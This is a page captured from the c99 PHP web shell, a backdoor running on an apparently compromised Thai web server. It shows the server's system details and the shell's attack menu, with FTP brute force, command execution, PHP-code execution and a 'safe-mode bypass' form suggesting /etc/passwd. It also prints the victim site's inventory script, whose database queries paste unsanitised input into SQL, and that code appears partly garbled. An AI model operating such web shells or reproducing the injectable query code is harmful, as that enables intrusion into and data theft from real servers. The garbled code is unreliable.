!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/Book_depart/   drwxr-xr-x
Free 52.81 GB of 127.8 GB (41.32%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     AccDetail.php (6.25 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("../include/FunctionDB.php");
ConnectDB();
 
$sql "Select * From accessories_tb Where code='$code'";
$result mysql_query($sql) or die(" Error").mysql_error();
$rs mysql_fetch_array($result)
?>
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>ข้อมูลพัสดุครุภัณฑ์</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="./source/style.css" rel="stylesheet" type="text/css">
<style type="text/css">
<!--
.style3 {color: #000000}
-->
</style>
</head>

<body bgcolor="#FFFFFF" topmargin="0">
<table width="99%" border="0" align="center" cellpadding="0" cellspacing="0">
  <tr>
    <th width="992" scope="col"><form name="form1" method="post" action="">
      <table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#EEEEEE"  style="border:1px solid gray"size="12">
        <tr bgcolor="#CCCCFF">
          <td colspan="3"><div align="center"><font color="#000000" size="4" face="Tahoma"><strong>แสดงรายละเอียด</strong></font></div></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td width="210" height="20"  bordercolor="#D8D2A9"><font size="2" face="Tahoma">รหัส</font></td>
          <td nowrap bordercolor="#DDF8D1"><strong><font color="#000000" size="2" face="Tahoma">
            <?php
            
echo"$rs[Acc_code]";
      
?>
          </font></strong></td>
          <td width="249" rowspan="13" nowrap bordercolor="#DDF8D1"><?php
        
echo"<center>";
        echo
"<img src=\"$rs[Img1]\" width=\"200\" height=\"150\" >";
        echo
"</center>";
       
?></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20"  bordercolor="#D8D2A9"><font size="2" face="Tahoma">ชื่ออุปกรณ์/ยี่ห้อ</font></td>
          <td nowrap bordercolor="#DDF8D1"><strong><font color="#000000" size="2" face="Tahoma">
            <?php
            
echo"$rs[Acc_name]";
      
?>
          </font></strong></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20"  bordercolor="#D8D2A9"><font size="2" face="Tahoma">ชนิด</font></td>
          <td nowrap bordercolor="#DDF8D1"><font color="#000000" size="2" face="Tahoma">
            <?php
         $Acc_type_code 
=  $rs["Acc_type_code"];
         
$sql "Select * From accessories_type_tb Where Acc_type_code='$Acc_type_code'";
          
$result1 mysql_query($sql) or die("Error".mysql_error());
          
$rss mysql_fetch_array($result1);
          echo 
"$rss[Acc_type] $rss[Acc_Etype]";
         
?>
          </font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20"  bordercolor="#D8D2A9"><span class="style3"><font size="2" face="Tahoma">หน่วยงาน /ฝ่าย ที่รับผิดชอบ </font></span></td>
          <td  bordercolor="#DDF8D1"><font color="#000000" size="2" face="Tahoma">
            <?php
         $Faculty_code 
=  $rs["Faculty_code"];
         
$sql "Select * From faculty_tb Where Faculty_code='$Faculty_code'";
          
$result1 mysql_query($sql) or die("Error".mysql_error());
          
$rss mysql_fetch_array($result1);
          echo 
"$rss[Faculty_name]";
         
?>
          </font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20"  bordercolor="#D8D2A9"><font size="2" face="Tahoma">ที่จัดเก็บ</font></td>
          <td width="471"  bordercolor="#DDF8D1"><font color="#000000" size="2" face="Tahoma"><? echo $rs[Store?></font><font color="#336600" size="2" face="Tahoma">&nbsp; </font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20"  bordercolor="#D8D2A9"><font size="2" face="Tahoma">ประวัติการซ่อม</font></td>
          <td width="471" ><font color="#000000" size="2" face="Tahoma"> <? echo  nl2br($rs[Fix_History])?> </font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20"  bordercolor="#D8D2A9"><font size="2" face="Tahoma">บริษัท 
            Contact</font></td>
          <td width="471"  bordercolor="#DDF8D1"><font color="#000000" size="2" face="Tahoma"><? echo  $rs[Contact]?></font><font color="#003366" size="2" face="Tahoma">&nbsp; </font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20" ><font size="2" face="Tahoma">ปี พ.ศ.ที่ซื้อ</font></td>
          <td  bordercolor="#DDF8D1"><font color="#003366" size="2" face="Tahoma">
            <?php 
       $sday 
$rs[Date_buy];
    
$yearthai explode("-",$sday);
    
$day =      intval($yearthai[2]);
    
$month =  intval($yearthai[1]);
    
$year =     intval($yearthai[0]);     
          
//////////////////
 //   $yearthai =  $day ;
 //    $month = TxtThaiMonth($month);
     
echo"$day"."/"."$month"."/"."$year";
    
?>
          </font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20"  bordercolor="#D8D2A9"><font size="2" face="Tahoma">ราคา</font></td>
          <td  bordercolor="#DDF8D1"><font color="#993333" size="2" face="Tahoma"><?echo number_format($rs['Price'],2,'.',','); ?></font><font color="#000000" size="2" face="Tahoma"> บาท </font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20"  bordercolor="#D8D2A9"><font color="#003366" size="2" face="Tahoma"></font><font size="2" face="Tahoma">งบประมาณการซ่อมแซม</font></td>
          <td  bordercolor="#DDF8D1"><font color="#000000" size="2" face="Tahoma"><? echo $rs[Fix_budget?> บาท </font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20" nowrap bordercolor="#D8D2A9"><font size="2" face="Tahoma">สถานะการใช้งาน</font></td>
          <td  bordercolor="#DDF8D1"><font color="#000000" size="2" face="Tahoma"><? echo $rs[Status?></font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20"  bordercolor="#D8D2A9"><font size="2" face="Tahoma">สถิติการใช้งาน</font> </td>
          <td ><font color="#000000" size="2" face="Tahoma"><? echo $rs[Statistic?></font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="20" nowrap bordercolor="#D8D2A9"><font size="2" face="Tahoma">บันทึกซ่วยจำ</font></td>
          <td ><font color="#000000" size="2" face="Tahoma"><? echo nl2br($rs[Description]) ?></font></td>
        </tr>
        <tr bgcolor="#eeeeee">
          <td height="22" colspan="3"><div align="center">
            <input type="button" name="Submit" value=" ปิดหน้าต่าง" onClick="javascript:parent.close();" class="button1">
          </div></td>
        </tr>
      </table>
        </form>
    </th>
  </tr>
</table>
<p>&nbsp;</p>
<p>&nbsp;</p>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0064 ]--